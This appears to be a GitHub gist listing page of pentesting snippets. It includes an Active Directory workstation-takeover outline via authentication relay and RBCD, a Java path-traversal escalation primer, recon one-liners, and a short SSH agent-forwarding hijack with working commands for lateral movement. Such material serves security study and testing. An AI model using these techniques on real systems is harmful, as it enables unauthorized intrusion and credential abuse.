Skip to content

Instantly share code, notes, and snippets.

View its0x08's full-sized avatar
☣️

0x08 its0x08

☣️
102 followers · 63 following
View GitHub Profile
@SkyyySi
SkyyySi / youtube-vanced-alternatives.md
Last active April 2, 2024 08:21
A list of alternatives after the shutdown of Vanced

NONE OF THESE CLIENTS ARE VERIFIED BY ME FOR SECURITY OR ANYTHING ELSE! USE AT YOUR OWN RISK!

These are the current alternatives (with links when possible):

@gladiatx0r
gladiatx0r / Workstation-Takeover.md
Last active April 25, 2024 13:23
From RPC to RCE - Workstation Takeover via RBCD and MS-RPChoose-Your-Own-Adventure

Overview

In the default configuration of Active Directory, it is possible to remotely take over Workstations (Windows 7/10/11) and possibly servers (if Desktop Experience is installed) when their WebClient service is running. This is accomplished in short by;

  • Triggering machine authentication over HTTP via either MS-RPRN or MS-EFSRPC (as demonstrated by @tifkin_). This requires a set of credentials for the RPC call.
  • Relaying that machine authentication to LDAPS for configuring RBCD
  • RBCD takeover

The caveat to this is that the WebClient service does not automatically start at boot. However, if the WebClient service has been triggered to start on a workstation (for example, via some SharePoint interactions), you can remotely take over that system. In addition, there are several ways to coerce the WebClient service to start remotely which I cover in a section below.

@approovm
approovm / 00-android-bypass-certificate-pinning-and-mitm-attack-setup.md
Last active April 23, 2024 01:21
Certificate Pinning Bypassing: Setup with Frida, mitmproxy and Android Emulator with a writable file system
@int0x80
int0x80 / SSH Agent Forwarding.md
Created January 7, 2021 00:59

Here's one of my favorite techniques for lateral movement: SSH agent forwarding. Use a UNIX-domain socket to advance your presence on the network. No need for passwords or keys.

root@bastion:~# find /tmp/ssh-* -type s
/tmp/ssh-srQ6Q5UpOL/agent.1460

root@bastion:~# SSH_AUTH_SOCK=/tmp/ssh-srQ6Q5UpOL/agent.1460 ssh user@internal.company.tld

user@internal:~$ hostname -f
internal.company.tld
@cihanmehmet
cihanmehmet / subdomain_wordlist.md
Last active May 11, 2024 19:58
Subdomain Wordlist
@harisec
harisec / exploit_path_traversals_in_Java_webapps.txt
Created April 27, 2020 10:24
quick primer on how to exploit path traversals in Java web apps (i.e. you can read WEB-INF/web.xml)
so, you can read WEB-INF/web.xml. how can you escalate this issue?
[step 1]. try to read other common Java files such as WEB-INF/web-jetty.xml.
use a specialized wordlist such as the following (from Sergey Bobrov/BlackFan):
https://github.com/BlackFan/WEB-INF-dict/blob/master/web-inf.txt
with time you can build your own wordlist adding files you've discovered over time.
use Burp Intruder for this, it's perfect for this job.
sort Intruder results by status code so you can see instantly which files were found.
@payloadartist
payloadartist / firefox.sh
Last active February 6, 2021 20:42
Enumerate sub-domains, then open them in Firefox automatically. Useful for taking a quick glance at target's assets, and make notes, while doing recon.
# ------Instructions---------
# Install (and configure) subfinder, assetfinder, and httprobe
# go get -v github.com/projectdiscovery/subfinder/cmd/subfinder && go get -v github.com/tomnomnom/httprobe && go get -v github.com/tomnomnom/assetfinder
# cat firefox.sh >> ~/.bashrc
# source ~/.bashrc
# Usage - subf_ff target.tld
# asset_ff target.tld
subf_ff () {
subfinder -d $1 -silent -t 100 | httprobe -c 50 | sort -u | while read line; do firefox $line; sleep 10; done
@dwisiswant0
dwisiswant0 / st8out.sh
Last active February 17, 2024 16:48
St8out - Extra one-liner for reconnaissance
#!/bin/bash
#####
#
# St8out - Extra one-liner for reconnaissance
#
# Usage: ./st8out.sh target.com
#
# Resources:
# - https://github.com/j3ssie/metabigor
@kmcquade
kmcquade / AWS API calls that return credentials.md
Last active May 2, 2024 14:39
AWS API calls that return credentials
@dianjuar
dianjuar / i3-shortcuts-screenshot.md
Last active April 24, 2024 15:10
My i3 shortcuts to take screenshots

Requirements

  • maim
  • xclip

Set-up

Set this on your i3 config file ~/.i3/config

# Screenshots